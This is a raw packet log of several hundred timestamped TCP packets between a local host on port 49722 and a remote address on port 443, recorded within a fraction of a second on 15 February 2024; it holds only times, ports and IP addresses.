Feb 15, 2024 19:42:27.001686096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.001722097 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.001734018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.001759052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.001952887 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.002351046 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.002367020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.002399921 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.002409935 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.002438068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.002444983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.002886057 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.002901077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.002943039 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.002949953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.002964973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.002993107 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.004154921 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.004170895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.004206896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.004215002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.004247904 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.004255056 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.094535112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.094562054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.094667912 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.094696999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.095681906 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.095704079 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.095746994 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.095767975 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.095783949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.096019030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096035004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096081972 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.096097946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096860886 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096879959 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096916914 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.096927881 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096941948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096945047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.096960068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.096966982 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.096986055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.097002983 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.097105980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.097168922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.097176075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.097640991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.097657919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.097697973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.097707033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.097733021 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.097800016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.097873926 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.097881079 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098053932 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098068953 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098109961 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.098123074 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098138094 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.098881006 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098901033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098939896 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.098948002 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.098973036 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.099162102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.099174976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.099214077 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.099221945 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.099239111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.101218939 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.101238966 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.101314068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.101322889 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.102176905 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.102202892 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.102248907 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.102257967 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.102276087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.104552031 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104573011 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104625940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.104652882 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104671001 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.104916096 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104931116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104962111 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.104970932 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104984045 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.104988098 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.105007887 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105035067 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.105041027 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105063915 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.105339050 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105354071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105381966 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.105391026 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105410099 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.105675936 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105695009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105722904 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.105732918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.105746031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.106184959 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.106199980 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.106234074 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.106242895 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.106256008 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.106700897 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.106719971 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.106750011 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.106760979 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.106776953 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.107130051 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107146025 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107189894 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.107199907 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107551098 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107613087 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.107624054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107810974 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107836008 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107872963 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.107887030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.107897997 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.108016968 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.108031988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.108069897 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.108078003 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.108110905 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.108705997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.108721018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.108791113 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.108802080 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109025955 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109040976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109087944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109098911 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109108925 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109390020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109407902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109442949 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109446049 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109460115 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109473944 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109483957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109503031 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109508991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109555006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109555006 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109913111 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109931946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.109973907 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.109982014 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.110011101 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.110017061 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.110435009 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.110451937 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.110507011 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.110516071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112440109 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112464905 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112540960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.112540960 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.112556934 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112724066 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112739086 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112786055 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.112793922 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112816095 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112829924 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.112835884 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112867117 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.112874985 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.112900019 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.112931967 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.113013029 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.113029957 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.113068104 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.113075018 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.113085985 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.113111973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.204730988 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.204751015 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.204870939 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.204888105 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.204998016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205017090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205066919 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.205073118 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205077887 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.205086946 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205116987 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205131054 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.205189943 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.205194950 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205601931 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205621004 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205656052 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.205666065 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.205696106 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209141970 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209156990 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209245920 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209256887 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209331989 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209352016 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209388018 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209394932 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209407091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209422112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209423065 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209466934 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209475040 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209485054 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209487915 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209505081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209520102 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209527969 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209552050 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.209944010 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.209961891 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210005999 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210012913 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210025072 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210031986 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210059881 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210067034 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210073948 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210112095 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210117102 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210129976 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210144997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210172892 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210179090 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210191011 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210197926 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210216999 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210243940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210249901 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210268021 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210272074 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210285902 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210330009 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210338116 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210347891 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210367918 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210392952 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210401058 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210413933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210423946 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210433960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210463047 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210469007 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210485935 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210489988 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210509062 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210545063 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210555077 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210566998 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210567951 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210586071 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210618973 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210624933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210637093 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210639954 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210664034 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210694075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210700989 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210715055 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210721016 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210731030 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210748911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210760117 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210781097 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210783005 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210805893 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210813046 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210819960 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210839987 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210860968 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210865974 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210874081 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210892916 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210912943 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210918903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210931063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210932016 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210946083 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210952997 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210972071 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.210978031 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.210995913 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211010933 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211025000 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211056948 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211062908 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211076021 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211078882 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211098909 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211134911 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211142063 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211153030 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211160898 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211175919 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211208105 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211215019 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211226940 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211226940 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211251020 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211283922 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211291075 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211302996 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211304903 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211323023 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211349964 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211355925 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211374044 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211379051 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211399078 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211430073 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211436033 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211447954 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211453915 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211468935 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211502075 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211508036 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211519003 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211523056 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211544991 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211577892 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211584091 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211595058 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211599112 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211616039 CET	443	49722	172.67.215.45	192.168.2.6
Feb 15, 2024 19:42:27.211672068 CET	49722	443	192.168.2.6	172.67.215.45
Feb 15, 2024 19:42:27.211678028 CET	443	49722	172.67.215.45	192.168.2.6
